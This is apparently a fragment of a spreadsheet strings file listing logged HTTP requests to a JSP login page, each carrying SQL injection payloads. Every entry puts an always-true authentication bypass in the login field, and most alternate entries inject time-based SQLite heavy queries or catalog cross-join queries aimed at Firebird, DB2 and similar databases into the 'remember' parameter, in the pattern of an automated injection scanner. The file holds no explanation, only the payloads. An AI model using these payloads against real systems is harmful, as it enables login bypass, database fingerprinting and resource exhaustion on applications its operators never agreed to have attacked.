    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1065&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6034')))or9581=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and((('kjdx'='kjdx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9223&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-659'or9581=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and'odiu'='odiu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-77&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3578')or9581=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and('wgzf'like'wgzf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-272&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-181'))or9581=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and(('yujd'like'yujd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6318&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-928')))or9581=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and((('ncrt'like'ncrt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-703&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6408'or9581=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and'nyaq'like'nyaq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3478&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1715")or9581=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and("yvye"="yvye&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4051&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1454"))or9581=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and(("uzal"="uzal&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4120&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3346")))or9581=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and((("dvep"="dvep&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5056&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5684"or9581=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and"fzrl"="fzrl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9671&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-415")or9581=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and("cnla"like"cnla&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5380&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1243"))or9581=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and(("biri"like"biri&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3964&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3270")))or9581=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and((("nulj"like"nulj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5906&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2522"or9581=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and"raov"like"raov&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6599&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8820)or3842=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5740&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3980')or3842=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1389&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5034'or3842=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-992&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2258"or3842=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7821)or3842=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and(6781=6781&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8023&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8511))or3842=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and((4426=4426&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8103&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-806)))or3842=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and(((7303=7303&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3932&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4495or3842=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4244&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5659')or3842=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and('gxqk'='gxqk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3872&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6701'))or3842=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and(('ffwg'='ffwg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3167&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3501')))or3842=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and((('rlgv'='rlgv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4418&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6510'or3842=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and'gbwf'='gbwf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6261&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7319')or3842=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and('ckaf'like'ckaf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4131&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-864'))or3842=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and(('hpsj'like'hpsj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7432&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6589')))or3842=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and((('fnmp'like'fnmp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3257&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6021'or3842=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and'ofzg'like'ofzg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2199&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-352")or3842=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and("zacc"="zacc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1539&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7122"))or3842=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and(("baer"="baer&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8000&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2498")))or3842=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and((("ofuj"="ofuj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-31"or3842=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and"uadb"="uadb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6602")or3842=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and("bnny"like"bnny&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-941&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2648"))or3842=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and(("dafs"like"dafs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6078&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1509")))or3842=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and((("flef"like"flef&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3771&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1109"or3842=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and"xqyc"like"xqyc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5831&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2031)or7212=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6727&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6657')or7212=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3714&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1811'or7212=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9970&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9122"or7212=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9993&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2955)or7212=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and(195=195&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6308&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7835))or7212=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and((8306=8306&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5413&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2815)))or7212=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and(((9738=9738&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2226&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5027or7212=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1654&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1572')or7212=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and('nybn'='nybn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6788&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5242'))or7212=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and(('jhjj'='jhjj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8557&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7698')))or7212=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and((('jrax'='jrax&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-886'or7212=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and'gzch'='gzch&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8267&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9048')or7212=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and('rbef'like'rbef&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4862&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7415'))or7212=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and(('vris'like'vris&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6232&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-901')))or7212=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and((('omaz'like'omaz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7502'or7212=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and'nafo'like'nafo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2121&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3607")or7212=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and("myog"="myog&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5518&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6343"))or7212=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and(("wtiy"="wtiy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-785&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2841")))or7212=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and((("fyrg"="fyrg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1586&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7691"or7212=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and"pydd"="pydd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2914&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7035")or7212=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and("vawy"like"vawy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3399&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5748"))or7212=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and(("whoc"like"whoc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2045&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3251")))or7212=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and((("typx"like"typx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8469&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2907"or7212=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and"clso"like"clso&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7326&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-305)or686=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4059&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6077')or686=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-787&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8327'or686=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7110&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7458"or686=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3767&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8049)or686=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and(3017=3017&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9577&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8275))or686=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and((8311=8311&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-117&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6112)))or686=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and(((4310=4310&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9185or686=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5848&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1470')or686=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and('kdjq'='kdjq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9482&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6023'))or686=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and(('tseg'='tseg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1934&amp;modo=entrar</t>
  </si>
  <si>
